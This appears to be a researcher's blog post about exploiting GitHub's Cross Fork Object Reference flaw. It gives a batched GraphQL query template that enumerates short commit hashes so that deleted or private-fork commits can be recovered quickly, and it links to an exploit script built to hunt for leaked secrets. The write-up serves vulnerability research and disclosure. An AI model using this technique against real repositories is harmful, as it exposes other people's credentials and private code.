CFOR Exploit - Recovering Deleted and Private Github Commits
CFOR stands for Cross Fork Object Reference. It’s an information disclosure vulnerability where deleted commits or commits from private forks can be exposed if you know the commit hash, it’s similar to an IDOR. The details about the flaw can be read in this blog post by TruffleSecurity who discovered the issue.
After reading that blog post I started writing an exploit script for it to try and find secrets/keys in the wild for bugbounty programs. The biggest problem with exploiting this is the number of requests you would have to do to enumerate all the commits using all the possible short SHAs. This makes it very tedious to exploit taking 12 hours or more to enumerate the commits from a single repo. Due to this I spent some time reading through the Github API docs to find an endpoint that would take more than one commit id and supports short SHAs. I soon realized that the Github GraphQL API is ideal for this as I can form the query myself and not rely on a REST API endpoint to exist. This is the query format I settled on:
query{
repository(owner:"repo_owner",name:"repo_name"){
a1:object(expression:"0000"){... on Commit {oid}}
a2:object(expression:"0001"){... on Commit {oid}}
}
}
This enables testing thousands of commit IDs per request which is a huge improvement on the original technique. From some initial testing I found that having too many commits in a query would lead to instability and that ~400 per query was relatively consistent.
To improve the exploit script effectiveness further it collects known commits from the repo and if there’s a collision it adds short SHAs with an additional character to the queue since if a commit already exists we don’t need to extract the data from that commit but we do still want to test those prefixes.
With this improved technique a repo’s commit ids could be discovered and downloaded in about 20 minutes, a significant improvement over the initial strategy.
The exploit script is available here: https://github.com/SorceryIE/cfor_exploit
After developing this approach I reached out to TruffleSecurity on the 28th of July through their contact form to see if they would be interested in paying for the details. I received no response but it seems that by the 31st of July they figured out the technique and implemented it to Trufflehog - their secrets scanning tool. On August 2nd they released a follow up blog post detailing this approach here.